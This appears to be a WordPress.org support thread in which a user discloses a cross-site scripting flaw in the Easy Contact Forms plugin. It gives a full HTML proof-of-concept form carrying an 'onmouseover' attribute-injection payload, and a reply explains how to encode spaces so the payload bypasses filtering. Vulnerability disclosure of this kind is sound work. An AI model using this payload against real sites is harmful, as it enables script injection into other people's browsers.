Title: XSS vulnerability
Last modified: August 22, 2016

---

# XSS vulnerability

 *  [Oleg Musaev](https://wordpress.org/support/users/oleg-musaev/)
 * (@oleg-musaev)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/xss-vulnerability-8/)
 * Hello. Our team has discovered a XSS vulnerability. You must escape form values​​
   to provide fix. Here is a sample form, which can be used to reproduce the problem:
 *     ```
       <html>
         <body>
           <form action="http://yoursiteurl.here/contacts/" method="POST">
             <input type="hidden" name="cf-no-script" value="1" />
             <input type="hidden" name="hidden-1" value="ufo-form-id-1" />
             <input type="hidden" name="id-3324" value="1&apos; onmouseover=alert(123) bad=&apos;" />
             <input type="hidden" name="id-3326" value="1" />
             <input type="hidden" name="id-3327" value="1" />
             <input type="hidden" name="id-3330" value="1" />
             <input type="hidden" name="sid" value="e20579ba69a4faccbb3efb7ef5e0692d" />
             <input type="hidden" name="ufo-form-pagename" value="contacts" />
             <input type="hidden" name="ufo-sign" value="b4cd2c00af96cf60c2db680ffbfa72841412162299" />
             <input type="submit" value="Submit request" />
           </form>
         </body>
       </html>
       ```
   
 * Put appropriate field IDs. Setup one required field and leave value attribute
   empty. To another field insert next value:
 *     ```
       value="1&apos; onmouseover=alert(123) bad=&apos;" />
       ```
   
 * Now you can submit created html form and alert function will run
 * [https://wordpress.org/plugins/easy-contact-forms/](https://wordpress.org/plugins/easy-contact-forms/)

Viewing 1 replies (of 1 total)

 *  Thread Starter [Oleg Musaev](https://wordpress.org/support/users/oleg-musaev/)
 * (@oleg-musaev)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/xss-vulnerability-8/#post-5411585)
 * Use & # 3 2; (without spaces :)) instead of spaces in value attribute

Viewing 1 replies (of 1 total)

The topic ‘XSS vulnerability’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/easy-contact-forms_0073b3.svg)
 * [Easy Contact Forms](https://wordpress.org/plugins/easy-contact-forms/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/easy-contact-forms/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/easy-contact-forms/)
 * [Active Topics](https://wordpress.org/support/plugin/easy-contact-forms/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/easy-contact-forms/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/easy-contact-forms/reviews/)

## Tags

 * [xss](https://wordpress.org/support/topic-tag/xss/)

 * 1 reply
 * 1 participant
 * Last reply from: [Oleg Musaev](https://wordpress.org/support/users/oleg-musaev/)
 * Last activity: [11 years, 6 months ago](https://wordpress.org/support/topic/xss-vulnerability-8/#post-5411585)
 * Status: not resolved